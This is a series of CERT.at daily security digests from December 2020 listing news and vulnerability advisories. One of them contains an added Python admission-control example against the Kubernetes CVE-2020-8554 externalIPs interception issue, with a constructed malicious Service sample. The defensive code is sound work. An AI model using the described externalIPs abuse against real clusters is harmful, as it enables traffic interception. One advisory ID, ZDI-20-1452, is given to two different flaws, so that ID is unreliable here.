=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 23-12-2020 18:00 − Monday 28-12-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ 2020 in review: the topics that kept us busy this year ∗∗∗
---------------------------------------------
The coronavirus crisis kept the whole world on edge in 2020, and Watchlist Internet felt it too. Criminals exploited the global health crisis for a range of scams: fake shops that added respirator masks to their catalogue, fraudulent job offers, and phishing messages. The growing trend of dubious advertising is also tied to various scams. Fake shops are [...]
---------------------------------------------
https://www.watchlist-internet.at/news/jahresrueckblick-2020-diese-themen-b…
∗∗∗ Amazon gift card delivers the Dridex banking trojan ∗∗∗
---------------------------------------------
A supposed Amazon gift card brings an unwelcome surprise: inattentive consumers are robbed by the Dridex banking trojan.
---------------------------------------------
https://www.zdnet.de/88391026/amazon-geschenkkarte-mit-banking-trojaner-dri…
∗∗∗ Attackers abuse Citrix appliances for DDoS attacks ∗∗∗
---------------------------------------------
Threat actors have found a way to use Citrix ADC network appliances to amplify junk web traffic for distributed denial-of-service (DDoS) attacks.
---------------------------------------------
https://www.zdnet.de/88391041/hacker-missbrauchen-citrix-geraete-fuer-ddos-…
∗∗∗ Reconciling DevOps and security ∗∗∗
---------------------------------------------
DevOps teams often see security as a brake on innovation. We offer some tips on how to combine effective development work with security.
---------------------------------------------
https://www.zdnet.de/88391052/devops-und-security-im-einklang/
∗∗∗ CrowdStrike releases free Azure security tool after failed hack ∗∗∗
---------------------------------------------
Leading cybersecurity firm CrowdStrike was notified by Microsoft that threat actors had attempted to read the company's emails using compromised Microsoft Azure credentials.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/crowdstrike-releases-free-az…
∗∗∗ GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic ∗∗∗
---------------------------------------------
A new strain of malware uses Word files with macros to download a PowerShell script from GitHub. That PowerShell script in turn downloads a legitimate image file from the image hosting service Imgur and decodes a Cobalt Strike script from it.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/github-hosted-malware-calcul…
∗∗∗ Multi-platform card skimmer found on Shopify, BigCommerce stores ∗∗∗
---------------------------------------------
A recently discovered multi-platform credit card skimmer can harvest payment info on compromised stores powered by Shopify, BigCommerce, Zencart, and Woocommerce.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/multi-platform-card-skimmer-…
∗∗∗ Third-Party APIs: How to Prevent Enumeration Attacks ∗∗∗
---------------------------------------------
Jason Kent, hacker-in-residence at Cequence, walks through online-retail card fraud and what to do about it.
---------------------------------------------
https://threatpost.com/third-party-apis-enumeration-attacks/162589/
∗∗∗ Analysis Dridex Dropper, IoC extraction (guest diary), (Wed, Dec 23rd) ∗∗∗
---------------------------------------------
A couple of weeks ago, I assisted Xavier when he taught FOR610 in (virtual) Frankfurt. Last week, one of our students (Nicklas Keijser) sent us this analysis that we decided to share as a guest diary.
---------------------------------------------
https://isc.sans.edu/diary/rss/26920
∗∗∗ CISA Releases Free Detection Tool for Azure/M365 Environment ∗∗∗
---------------------------------------------
CISA has created a free tool for detecting unusual and potentially malicious activity that threatens users and applications in an Azure/Microsoft O365 environment. The tool is intended for use by incident responders and is narrowly focused on activity that is endemic to the recent identity- and authentication-based attacks seen in multiple sectors.
---------------------------------------------
https://us-cert.cisa.gov/ncas/current-activity/2020/12/24/cisa-releases-fre…
∗∗∗ The History of DNS Vulnerabilities and the Cloud ∗∗∗
---------------------------------------------
We review the history of DNS vulnerabilities, particularly DNS cache poisoning, examining both past vulnerabilities and more advanced attacks.
---------------------------------------------
https://unit42.paloaltonetworks.com/dns-vulnerabilities/
=====================
= Vulnerabilities =
=====================
∗∗∗ Project Zero: poorly patched Windows flaw still exploitable ∗∗∗
---------------------------------------------
An actively exploited security vulnerability in Windows remains unfixed, despite Google's reports and an inadequate patch.
---------------------------------------------
https://www.golem.de/news/project-zero-schlecht-gepatchte-windows-luecke-we…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (spip and sympa), Gentoo (c-ares, cherokee, curl, dbus, firefox, gdk-pixbuf, haproxy, libass, nss, openssl, pdns, pdns-recursor, php, samba, tomcat, and webkit-gtk), and SUSE (java-1_8_0-ibm, openexr, and python3).
---------------------------------------------
https://lwn.net/Articles/841225/
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (xen) and SUSE (flac and openexr).
---------------------------------------------
https://lwn.net/Articles/841243/
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (horizon, kitty, python-apt, and roundcube), Fedora (libmaxminddb, mediawiki, mingw-binutils, and thunderbird), Mageia (erlang-rebar3), openSUSE (blosc, ceph, firefox, flac, kdeconnect-kde, openexr, ovmf, PackageKit, python3, thunderbird, and xen), and SUSE (thunderbird).
---------------------------------------------
https://lwn.net/Articles/841378/
∗∗∗ VU#429301: Veritas Backup Exec is vulnerable to privilege escalation due to OPENSSLDIR location ∗∗∗
---------------------------------------------
https://kb.cert.org/vuls/id/429301
∗∗∗ VU#843464: SolarWinds Orion API authentication bypass allows remote command execution ∗∗∗
---------------------------------------------
https://kb.cert.org/vuls/id/843464
∗∗∗ Security Bulletin: IBM MQ is affected by a vulnerability in Eclipse Jetty (CVE-2019-17638) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-is-affected-by-a-v…
∗∗∗ Security Bulletin: tzdata has been updated to tzdata-2020d to address Fiji and Palestine time zone changes ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-tzdata-has-been-updated-t…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Samba affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Linux kernel and TMM vulnerability CVE-2020-25705 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K09604370
∗∗∗ Linux kernel vulnerability CVE-2018-10675 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K40540405
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 22-12-2020 18:00 − Wednesday 23-12-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Emotet Returns to Hit 100K Mailboxes Per Day ∗∗∗
---------------------------------------------
Just in time for the Christmas holiday, Emotet is sending the gift of Trickbot.
---------------------------------------------
https://threatpost.com/emotet-returns-100k-mailboxes/162584/
∗∗∗ Security nightmare: many connected doorbells let attackers into the house ∗∗∗
---------------------------------------------
Cheap digital video doorbells have serious security flaws such as authentication problems, and some ship with software bugs out of the box.
---------------------------------------------
https://heise.de/-4998372
∗∗∗ Millions of Devices Affected by Vulnerabilities Used in Stolen FireEye Tools ∗∗∗
---------------------------------------------
Millions of devices are exposed to potential attacks exploiting the vulnerabilities used in the tools that threat actors recently stole from FireEye, security and compliance solutions provider Qualys reported on Tuesday.
---------------------------------------------
https://www.securityweek.com/millions-devices-affected-vulnerabilities-used…
∗∗∗ Video: how to spot fraudulent emergency repair services ∗∗∗
---------------------------------------------
When a water pipe bursts, a gas line fails or the power goes out, things usually have to move fast, and there is rarely time to vet a plumbing or electrical emergency service. Fraudsters exploit this: they advertise an emergency service online and do actually show up, but bill grossly inflated costs, and the damage is often only superficially repaired.
---------------------------------------------
https://www.watchlist-internet.at/news/video-so-erkennen-sie-betruegerische…
∗∗∗ Trending: BEC attacks and COVID-19 scams ∗∗∗
---------------------------------------------
Spear phishing, business email compromise (BEC) and COVID-19-related cyber fraud are examples of how quickly attackers adapt to current events and adopt new tricks to make their attacks succeed, as Barracuda's Spear-Phishing Report 2020 shows.
---------------------------------------------
https://www.zdnet.de/88391006/trendthema-bec-attacken-und-covid-19-scamming/
∗∗∗ Hentai Oniichan Ransomware ∗∗∗
---------------------------------------------
VMRay has published a blog post detailing a ransomware family called Hentai Oniichan. Two variants of this family, King Engine and Beserker, were observed in the wild during their investigation.
---------------------------------------------
https://exchange.xforce.ibmcloud.com/collection/1b1c396cce25259b8bc5e806b35…
=====================
= Vulnerabilities =
=====================
∗∗∗ QNAP fixes high severity QTS, QES, and QuTS hero vulnerabilities ∗∗∗
---------------------------------------------
QNAP has released security updates to fix multiple high severity security vulnerabilities impacting network-attached storage (NAS) devices running the QES, QTS, and QuTS hero operating systems.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/qnap-fixes-high-severity-qts…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (awstats and mediawiki), Fedora (mbedtls and pngcheck), openSUSE (firefox and thunderbird), Oracle (gnutls, go-toolset:ol8, pacemaker, postgresql:10, postgresql:12, and postgresql:9.6), and SUSE (clamav, groovy, jetty-minimal, and xen).
---------------------------------------------
https://lwn.net/Articles/841163/
∗∗∗ Security Advisory - Memory Leak Vulnerability in Huawei CloudEngine Product ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201223-…
∗∗∗ Security Bulletin: Multiple Vulnerabilities in Websphere Liberty server (WLP) affects IBM Cloud Application Business Insights ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a Denial of Service on Windows (CVE-2020-4642) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM SDK, Java affects IBM Cloud Application Business Insights ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ cURL vulnerability CVE-2019-5482 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K41523201
∗∗∗ Asterisk: multiple vulnerabilities allow denial of service ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1259
∗∗∗ QNAP NAS: multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1261
∗∗∗ Grafana: multiple vulnerabilities allow security controls to be bypassed ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1260
∗∗∗ Joomla: multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1256
=====================
= End-of-Day report =
=====================
Timeframe: Monday 21-12-2020 18:00 − Tuesday 22-12-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Ransomware Task Force founded ∗∗∗
---------------------------------------------
Various security specialists have launched the Ransomware Task Force. Founding members include well-known names such as Microsoft, McAfee and Citrix, as well as smaller vendors and non-profit organisations.
---------------------------------------------
https://www.zdnet.de/88390942/ransomware-task-force-gegruendet/
∗∗∗ Least Privilege Application Management - A Lesson Learned from SolarWinds Orion ∗∗∗
---------------------------------------------
The sophisticated, nation-state assault used to infiltrate SolarWinds Orion and then leveraged to compromise potentially thousands of its customers is astonishing in scope and potential fallout.
---------------------------------------------
https://www.beyondtrust.com/blog/entry/least-privilege-application-manageme…
∗∗∗ Smart Doorbell Disaster: Many Brands Vulnerable to Attack ∗∗∗
---------------------------------------------
Investigation reveals device sector is problem plagued when it comes to security bugs.
---------------------------------------------
https://threatpost.com/smart-doorbell-vulnerable-to-attack/162527/
∗∗∗ Patrick Wardle on Hackers Leveraging 'Powerful' iOS Bugs in High-Level Attacks ∗∗∗
---------------------------------------------
Noted Apple security expert Patrick Wardle discusses how cybercriminals are stepping up their game in targeting Apple users with new techniques and cyberattacks.
---------------------------------------------
https://threatpost.com/patrick-wardle-on-hackers-leveraging-powerful-ios-bu…
∗∗∗ Threat Actors Increasingly Using VBA Purging in Attacks ∗∗∗
---------------------------------------------
Cyberattacks relying on malicious Office documents have increasingly leveraged a relatively new technique called VBA Purging, FireEye said over the weekend, when it also announced the availability of a related open source tool.
---------------------------------------------
https://www.securityweek.com/threat-actors-increasingly-using-vba-purging-a…
∗∗∗ Increase in Drive-by Attacks Using SocGholish ∗∗∗
---------------------------------------------
The SocGholish framework is commonly used to distribute fake updates for applications such as Chrome, Firefox, Flash Player, and Microsoft Teams through drive-by downloads. Menlo Labs has reported an uptick in attacks using SocGholish.
---------------------------------------------
https://exchange.xforce.ibmcloud.com/collection/ef2a09a8bb57d90f200a51af745…
∗∗∗ Meyhod - Yet Another Magecart Skimmer ∗∗∗
---------------------------------------------
Discovered by RiskIQ in October, Meyhod is a Magecart skimmer that researchers observed on several sites; in some cases it had been present on a site for months. The IP address hosting the malicious JavaScript has several other domains associated with it that are suspected to be malicious.
---------------------------------------------
https://exchange.xforce.ibmcloud.com/collection/5a493a06b3a2fa9585d3f239007…
=====================
= Vulnerabilities =
=====================
∗∗∗ Maximum-severity vulnerability in Dell Wyse thin clients ∗∗∗
---------------------------------------------
Two critical vulnerabilities put Dell's Wyse thin clients at risk. Updates are available.
---------------------------------------------
https://heise.de/-4997456
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by CentOS (kernel and thunderbird), Debian (openjdk-8 and webkit2gtk), Fedora (gdm, mingw-openjpeg2, and openjpeg2), Mageia (compat-openssl10, golang-googlecode-net, mbedtls, openssl, and virtualbox), openSUSE (ovmf and xen), Red Hat (kernel, mariadb-connector-c, mariadb:10.3, postgresql:10, and postgresql:9.6), and SUSE (ardana-cassandra, ardana-mq, ardana-osconfig, ardana-tempest, crowbar-core, crowbar-openstack, grafana, influxdb, openstack-cinder, [...]
---------------------------------------------
https://lwn.net/Articles/841099/
∗∗∗ Protecting Against an Unfixed Kubernetes Man-in-the-Middle Vulnerability (CVE-2020-8554) ∗∗∗
---------------------------------------------
A currently unpatched, medium-severity issue affecting all Kubernetes versions, CVE-2020-8554 can be mitigated in several ways.
---------------------------------------------
https://unit42.paloaltonetworks.com/cve-2020-8554/
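The Unit 42 write-up linked above lists mitigations without showing one. As an added example (not code from Unit 42 or the Kubernetes project), the following Python implements the check a validating admission webhook applies for this CVE: a user who may create or update Services can set `spec.externalIPs` to any address, and kube-proxy then routes cluster traffic for that address to the Service's endpoints, which is the man-in-the-middle primitive. The policy denies Services whose externalIPs are not on an operator-maintained allowlist. The allowlist, the AdmissionReview samples, the namespaces and the UIDs are constructed for this example.

```python
"""Admission-time check against CVE-2020-8554 (Kubernetes externalIPs abuse).

Added example, not code from Unit 42 or the Kubernetes project. It mirrors the
logic of the validating-admission-webhook mitigation: a Service may only use
spec.externalIPs that the cluster operator has explicitly allowed.
"""
import ipaddress
import json
from typing import Dict, List, Tuple

# Constructed allowlist for this example (TEST-NET-1 addresses): the only
# externalIPs an operator has deliberately assigned to Services.
ALLOWED_EXTERNAL_IPS = {"192.0.2.10", "192.0.2.11"}


def validate_service(service: Dict) -> Tuple[bool, str]:
    """Return (allowed, reason) for a Service manifest.

    A Service without spec.externalIPs is always allowed. That field is the
    part of the Service object CVE-2020-8554 turns into an interception
    primitive: kube-proxy programs the nodes so that cluster traffic for any
    listed address is delivered to the Service's endpoints.
    """
    meta = service.get("metadata", {})
    name = f"{meta.get('namespace', 'default')}/{meta.get('name', '<unnamed>')}"
    external_ips: List[str] = service.get("spec", {}).get("externalIPs") or []

    rejected = []
    for raw in external_ips:
        try:
            ip = ipaddress.ip_address(raw)
        except ValueError:
            return False, f"Service {name}: externalIPs entry {raw!r} is not an IP address"
        if str(ip) not in ALLOWED_EXTERNAL_IPS:
            rejected.append(str(ip))

    if rejected:
        return False, (f"Service {name}: externalIPs not on the allowlist: "
                       + ", ".join(rejected))
    return True, "ok"


def review(admission_review: Dict) -> Dict:
    """Build the AdmissionReview response the API server expects back."""
    request = admission_review["request"]
    allowed, reason = validate_service(request["object"])
    response: Dict = {"uid": request["uid"], "allowed": allowed}
    if not allowed:
        response["status"] = {"code": 403, "message": reason}
    return {"apiVersion": "admission.k8s.io/v1",
            "kind": "AdmissionReview",
            "response": response}


def _admission_review(uid: str, service: Dict) -> Dict:
    """Wrap a Service in a minimal AdmissionReview request (constructed)."""
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview",
            "request": {"uid": uid,
                        "kind": {"group": "", "version": "v1", "kind": "Service"},
                        "operation": "CREATE", "object": service}}


# Constructed samples. The malicious one claims an externalIP that belongs to
# another system, so pods talking to that address would be silently routed to
# the attacker's endpoints.
BENIGN_REVIEW = _admission_review("11111111-aaaa", {
    "metadata": {"name": "web", "namespace": "shop"},
    "spec": {"type": "ClusterIP", "externalIPs": ["192.0.2.10"],
             "ports": [{"port": 443}]}})

MALICIOUS_REVIEW = _admission_review("22222222-bbbb", {
    "metadata": {"name": "registry", "namespace": "tenant-b"},
    "spec": {"type": "ClusterIP", "externalIPs": ["198.51.100.5"],
             "ports": [{"port": 443}]}})

if __name__ == "__main__":
    for ar in (BENIGN_REVIEW, MALICIOUS_REVIEW):
        print(json.dumps(review(ar)["response"], indent=2))
```

This is the same rule the published OPA Gatekeeper constraint for the CVE enforces, written out in Python so it can be run and tested offline. It does not cover the second variant of the issue, where a principal with write access to the `services/status` subresource patches a LoadBalancer Service's `status.loadBalancer.ingress`; that path has to be closed with RBAC, by granting status writes only to the cloud controller.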
∗∗∗ BlackBerry Powered by Android Security Bulletin - December 2020 ∗∗∗
---------------------------------------------
http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Spectrum Conductor and IBM Spectrum Conductor with Spark ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Bind affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: Apache POI as used by IBM QRadar SIEM is vulnerable to information disclosure (CVE-2019-12415, CVE-2017-12626) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-poi-as-used-by-ibm…
∗∗∗ Apache Struts vulnerability CVE-2020-17530 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K24608264
=====================
= End-of-Day report =
=====================
Timeframe: Friday 18-12-2020 18:00 − Monday 21-12-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Current wave of ping calls ∗∗∗
---------------------------------------------
The Austrian regulator Rundfunk und Telekom Regulierungs-GmbH (RTR) is currently receiving a growing number of reports of ping calls from abroad. The calls originate in particular from Tunisia (+216), Abkhazia (+79407), Switzerland (+41748) and Uganda (+256). Do not call back or answer, as doing so can incur high charges.
---------------------------------------------
https://www.watchlist-internet.at/news/aktuelle-welle-mit-ping-anrufen/
∗∗∗ Gitpaste-12 worm botnet returns with 30+ vulnerability exploits ∗∗∗
---------------------------------------------
The recently discovered Gitpaste-12 worm, which spreads via GitHub and also hosts its malicious payload on Pastebin, has returned with over 30 vulnerability exploits, according to researchers at Juniper Labs.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/gitpaste-12-worm-botnet-retu…
∗∗∗ Hacker Dumps Crypto Wallet Customer Data; Active Attacks Follow ∗∗∗
---------------------------------------------
Customer data from a June attack against cryptocurrency wallet firm Ledger is now public and actively being used in attacks.
---------------------------------------------
https://threatpost.com/ledger-dump-active-attacks-follow/162477/
=====================
= Vulnerabilities =
=====================
∗∗∗ ZDI-20-1452: (0Day) Microsoft 3D Builder GLB File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft 3D Builder. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1452/
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (curl, influxdb, lxml, node-ini, php-pear, and postsrsd), Fedora (chromium, curl, firefox, matrix-synapse, mingw-jasper, phpldapadmin, and thunderbird), Mageia (openjpeg2), openSUSE (gcc7, openssh, PackageKit, python-urllib3, slurm_18_08, and webkit2gtk3), Oracle (fapolicydbug, firefox, nginx:1.16, nodejs:12, and thunderbird), Red Hat (libpq, openssl, and thunderbird), and SUSE (curl, firefox, openssh, ovmf, slurm_17_11, slurm_18_08, slurm_20_02, and [...]
---------------------------------------------
https://lwn.net/Articles/840972/
∗∗∗ Authentication Bypass Vulnerability Patched in Bouncy Castle Library ∗∗∗
---------------------------------------------
A high-severity authentication bypass vulnerability was recently addressed in the Bouncy Castle cryptography library. Founded in 2000, the project represents a collection of APIs used in cryptography for both Java and C#, with a strong emphasis on standards compliance and adaptability.
---------------------------------------------
https://www.securityweek.com/authentication-bypass-vulnerability-patched-bo…
∗∗∗ Treck TCP/IP Stack ∗∗∗
---------------------------------------------
This advisory contains mitigations for heap-based buffer overflow, out-of-bounds read, and out-of-bounds write vulnerabilities in Treck's TCP/IP stack, which may also be known as Kasago TCP/IP, ELMIC, Net+ OS, Quadnet, GHNET v2, Kwiknet, or AMX.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-353-01
∗∗∗ December 21, 2020 TNS-2020-11 [R1] Tenable.sc 5.17.0 Fixes Multiple Vulnerabilities ∗∗∗
---------------------------------------------
https://www.tenable.com/security/tns-2020-11
∗∗∗ HCL Domino and Notes: multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1254
∗∗∗ Red Hat OpenShift: vulnerability allows denial of service and code execution ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1252
∗∗∗ Security Bulletin: Information disclosure and denial-of-service vulnerability affects IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4794 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-an…
∗∗∗ Security Bulletin: Financial Transaction Manager for ACH Services is affected by a potential logout session timeout (CVE-2020-4555) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man…
∗∗∗ Security Bulletin: Financial Transaction Manager for Check Services is affected by a potential logout session timeout (CVE-2020-4555) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man…
∗∗∗ Security Bulletin: IBM MQ could allow an authenticated user, under a non-default configuration, to cause a data corruption attack due to an error when using segmented messages (CVE-2020-4592) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-could-allow-an-aut…
∗∗∗ Security Bulletin: Vulnerability in BIND affects AIX (CVE-2020-8622) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-bind-aff…
∗∗∗ Security Bulletin: Multiple vulnerabilities in the IBM Java Runtime affect IBM Rational ClearQuest ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM MQ Appliance is affected by denial of service vulnerabilities (CVE-2020-5481, CVE-2020-4580, CVE-2020-4579) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-appliance-is-affec…
∗∗∗ Security Bulletin: Multiple vulnerabilities in middleware software affect IBM Cloud Pak for Automation ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Financial Transaction Manager for Corporate Payment Services is affected by a potential logout session timeout (CVE-2020-4555) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man…
∗∗∗ Security Bulletin: Financial Transaction Manager for Corporate Payment Services v2.1.1 is affected by a potential logout session timeout (CVE-2020-4555) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man…
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 17-12-2020 18:00 − Friday 18-12-2020 18:00
Handler: Dimitri Robl
Co-Handler: Robert Waldner
=====================
= News =
=====================
∗∗∗ Security baseline (FINAL) for Windows 10 and Windows Server, version 20H2 ∗∗∗
---------------------------------------------
We are pleased to announce the final release of the security baseline package for Windows 10 and Windows Server, version 20H2 (a.k.a. October 2020 Update)!
---------------------------------------------
https://techcommunity.microsoft.com/t5/microsoft-security-baselines/securit…
∗∗∗ A slightly optimistic tale of how patching went for CVE-2019-19781, (Fri, Dec 18th) ∗∗∗
---------------------------------------------
Since we could all probably use a little distraction from the current Solarigate/SUNBURST news, I thought it might be good to look at something a little bit more positive today. Specifically, at how patching of CVE-2019-19781 AKA "Shitrix" AKA "one of the more famous named vulnerabilities from the end of 2019" went.
---------------------------------------------
https://isc.sans.edu/diary/rss/26900
∗∗∗ Emails with fake domain invoices in circulation ∗∗∗
---------------------------------------------
Companies are currently receiving emails claiming that they must pay an invoice for a domain registration. In fact, the recipients never placed any such order. You should therefore not pay anything and ignore the email.
---------------------------------------------
https://www.watchlist-internet.at/news/e-mails-mit-gefaelschten-domain-rech…
∗∗∗ SUPERNOVA: SolarStorm’s Novel .NET Webshell ∗∗∗
---------------------------------------------
The SolarStorm actors behind the supply chain attack on SolarWinds' Orion software have demonstrated a high degree of technical sophistication and attention to operational security, as well as a novel combination of techniques in the potential compromise of approximately 18,000 SolarWinds customers. As published in the original disclosure, the attackers were observed removing their initial backdoor once a more legitimate method of persistence was obtained.
---------------------------------------------
https://unit42.paloaltonetworks.com/solarstorm-supernova/
∗∗∗ Operation SignSight: Supply‑chain attack against a certification authority in Southeast Asia ∗∗∗
---------------------------------------------
ESET researchers uncovered this new supply-chain attack in early December 2020 and notified the compromised organization and the VNCERT. We believe that the website has not been delivering compromised software installers as of the end of August 2020 and ESET telemetry data does not indicate the compromised installers being distributed anywhere else. The Vietnam Government Certification Authority confirmed that they were aware of the attack before our notification and that they notified the users who downloaded the trojanized software.
---------------------------------------------
https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-…
∗∗∗ Updates on SolarWinds Orion ∗∗∗
---------------------------------------------
The situation around the supply-chain attack on SolarWinds' Orion product has gained several new facets:
---------------------------------------------
https://cert.at/de/aktuelles/2020/12/updates-zu-solarwinds-orion
=====================
= Vulnerabilities =
=====================
∗∗∗ ZDI-20-1452: NETGEAR Multiple Routers mini_httpd Command Injection Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1452/
∗∗∗ ZDI-20-1451: NETGEAR Multiple Routers mini_httpd Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1451/
∗∗∗ VMSA-2020-0029 VMware ESXi, Workstation, Fusion and Cloud Foundation updates address a denial of service vulnerability (CVE-2020-3999) ∗∗∗
---------------------------------------------
A denial of service vulnerability in VMware ESXi, Workstation and Fusion was privately reported to VMware. Updates are available to address this vulnerability in affected VMware products.
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0029.html
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (blueman, chromium, gdk-pixbuf2, hostapd, lib32-gdk-pixbuf2, minidlna, nsd, pam, and unbound), CentOS (gd, openssl, pacemaker, python-rtslib, samba, and targetcli), Debian (kernel, lxml, and mediawiki), Fedora (mbedtls), openSUSE (clamav and openssl-1_0_0), Oracle (firefox and openssl), Red Hat (openssl, postgresql:12, postgresql:9.6, and thunderbird), Scientific Linux (openssl and thunderbird), and SUSE (cyrus-sasl, openssh, slurm_18_08, and webkit2gtk3).
---------------------------------------------
https://lwn.net/Articles/840731/
∗∗∗ D-LINK Router DSL-2888A: Multiple Vulnerabilities ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit multiple vulnerabilities in D-LINK routers to bypass authentication, escalate privileges, execute code or disclose information.
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-1246
∗∗∗ Security Bulletin: z/TPF is affected by an OpenSSL vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-z-tpf-is-affected-by-an-o…
∗∗∗ Security Bulletin: IBM Planning Analytics has addressed a security vulnerability (CVE-2020-4764) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-planning-analytics-ha…
∗∗∗ Security Bulletin: Version 12.18.0 of Node.js included in IBM Netcool Operations Insight 1.6.2.x has several security vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-version-12-18-0-of-node-j…
∗∗∗ Emerson Rosemount X-STREAM ∗∗∗
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-352-01
∗∗∗ PTC Kepware KEPServerEX ∗∗∗
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-352-02
